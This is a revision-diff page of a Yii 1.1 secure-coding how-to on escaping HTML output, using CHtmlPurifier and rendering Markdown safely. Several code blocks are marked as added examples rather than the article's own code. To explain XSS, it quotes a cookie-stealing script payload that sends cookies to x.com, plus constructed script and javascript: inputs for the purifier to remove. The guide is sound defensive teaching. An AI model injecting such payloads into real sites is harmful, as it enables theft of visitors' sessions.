Difference between #15 and #16 of
How to write secure Yii1 applications

Revision #16 has been created by François Gannaz on Oct 30, 2013, 9:01:19 AM with the memo:

Better doc on HTML escaping
« previous (#15) next (#17) »

Changes

Title unchanged

How to write secure Yii applications

Category unchanged

How-tos

Yii version unchanged

Tags unchanged

security, authorization, authentication, XSS, SQL injection

Content changed

[...]
### Example

Here is an extract of a view. The page just shows a user profile.
~~~
[html]
<h2>Profile of <?php echo $user->name ?></h2>
Other unfiltered and insecure outputs:
<a href="/posts?name=<?php echo $user->login ?>" title='<?php echo $user->name ?>'>See my posts</a>
~~~

Why is this dangerous? Suppose the user's name is:
~~~
[html]
Joe<script>document.write('<img src="http://x.com/save.php?cookie='+getCookie()+'" />');function getCookie(){...}</script>
~~~
Then everyone that consults this profile will send an HTTP request for an external image, and this request will contain data describing the visitor's cookies. This is an XSS attack.

PHP provides several functions that protect the output.
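The same profile view with every output escaped for the context it lands in, as an added example (not the article's own code). It assumes `$user` is an active record with `name` and `login` attributes and that the `/posts` route exists; `CHtml::encode()` is `htmlspecialchars()` with `ENT_QUOTES`, `CHtml::link()` builds the URL through `createUrl()` (which URL-encodes query values) and HTML-encodes the values in its `htmlOptions`.

```php
<?php
/* Hardened version of the profile view (added example, not from the article).
 * Assumed: $user is an active record with name and login attributes. */
?>
<h2>Profile of <?php echo CHtml::encode($user->name); ?></h2>
Other outputs, each escaped for its context:
<?php echo CHtml::link(
    'See my posts',                                   // link text is NOT encoded by CHtml::link, so keep it a literal
    array('/posts', 'name' => $user->login),          // route + params: createUrl() urlencodes the query value
    array('title' => $user->name)                     // htmlOptions values are HTML-encoded by CHtml::renderAttributes
); ?>

<!-- The equivalent written by hand, to show which encoder belongs where: -->
<a href="/posts?name=<?php echo urlencode($user->login); ?>"
   title="<?php echo CHtml::encode($user->name); ?>">See my posts</a>
```

Note the two different encoders: the query string parameter needs `urlencode()` (URL context), while the attribute value and the heading need `CHtml::encode()` (HTML context). Using `CHtml::encode()` inside the query string, or `urlencode()` inside the `title`, would leave one of the two contexts unprotected.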
[...]
```php
$purifier = new CHtmlPurifier();
$purifier->options = array(
    'HTML.Allowed' => 'p,a[href],b,i',
);
foreach (Comment::model()->findAll() as $comment) {
[...]
```
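A complete version of the comment loop above with a stricter whitelist, as an added example (not the article's code). It assumes a `Comment` active record with a `content` attribute holding the raw HTML the user submitted; the option names are HTML Purifier configuration keys (`HTML.Allowed`, `URI.AllowedSchemes`, `AutoFormat.RemoveEmpty`) passed through `CHtmlPurifier::options`.

```php
<?php
// Added example: rendering stored comments through CHtmlPurifier.
// Assumed: Comment is an active record with a `content` attribute (raw user HTML).
$purifier = new CHtmlPurifier();
$purifier->options = array(
    // Only these elements survive; [href] is the single attribute <a> may keep.
    'HTML.Allowed'           => 'p,a[href],b,i',
    // hrefs may only use these schemes, so javascript: and data: links lose their href.
    'URI.AllowedSchemes'     => array('http' => true, 'https' => true),
    // Drop elements left empty after their disallowed children were removed.
    'AutoFormat.RemoveEmpty' => true,
);

// Constructed malicious comment, to show what the whitelist removes:
//   <p>Hi <script>alert(1)</script><a href="javascript:alert(1)" onclick="x()">link</a></p>
// purify() returns roughly: <p>Hi <a>link</a></p>
//   - <script> and its contents go (not in HTML.Allowed)
//   - onclick goes (not in a[href]'s attribute list)
//   - the javascript: href fails URI.AllowedSchemes, so the attribute goes

foreach (Comment::model()->findAll() as $comment) {
    // Purify at output time, so a later change to the whitelist also applies to old comments.
    echo '<div class="comment">' . $purifier->purify($comment->content) . '</div>';
}
```

Purifying on output rather than once on input costs some CPU per request but means the stored text is never mistaken for trusted HTML elsewhere in the application.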

Allowing the user to enter HTML text can be useful, especially with rich text editors like TinyMCE or CKEditor, but you may instead **consider using templating languages**, like Markdown or wiki syntax. Regarding security, the benefit is that the application itself converts the text to HTML, so the risk of XSS is low.
```php
<div class="comment">
<?php
$md = new CMarkdownParser();
echo "<div>" . $md->transform($comment) . "</div>";
?>
</div>
```
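One caveat a practitioner should know: Markdown passes raw HTML through unchanged, so `transform()` alone still emits any tag the author typed. The added example below (not the article's code) contrasts it with `CMarkdownParser::safeTransform()`, which runs the generated HTML through `CHtmlPurifier`. It assumes `$comment` holds the raw Markdown text of one comment; the input string is constructed for the demonstration.

```php
<?php
// Added example: rendering user-supplied Markdown safely.
// Assumed: $comment is the raw Markdown text of one comment.
$md = new CMarkdownParser();

// Constructed input: Markdown formatting mixed with an inline HTML element.
$comment = "Nice post! <script>alert('xss')</script>\n\n"
         . "**bold** and [a link](http://example.com)";

// Markdown leaves inline HTML untouched, so the <script> element survives here.
$unsafe = $md->transform($comment);

// safeTransform() = transform() + CHtmlPurifier::purify(): the script element is
// stripped, while the <strong> and <a> that Markdown generated are kept.
$safe = $md->safeTransform($comment);
?>
<div class="comment"><?php echo $safe; ?></div>
```

So "the application converts to HTML" only lowers the XSS risk when the converter's output is also purified (or the converter is configured to reject raw HTML); `safeTransform()` gives you that with one method call.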
 
 
##### To go further:

* [HTML Purifier's doc](http://htmlpurifier.org/docs). The end-user documentation contains a few thematic tutorials, like ["Customize"](http://htmlpurifier.org/docs/enduser-customize.html). The [Configuration Reference](http://htmlpurifier.org/live/configdoc/plain.html) lists all the options you can use with [CHtmlPurifier](http://www.yiiframework.com/doc/api/1.1/CHtmlPurifier), but it lacks examples.
* [CMarkdown](http://www.yiiframework.com/doc/api/1.1/CMarkdown/) and [CMarkdownParser](http://www.yiiframework.com/doc/api/1.1/CMarkdownParser/)


### Special cases: URLs, CSS, etc

#### URL
[...]
114 followers
Viewed: 309 905 times
Version: 1.1
Category: How-tos
Written by: François Gannaz
Last updated by: François Gannaz
Created on: Nov 22, 2011
Last updated: 2 years ago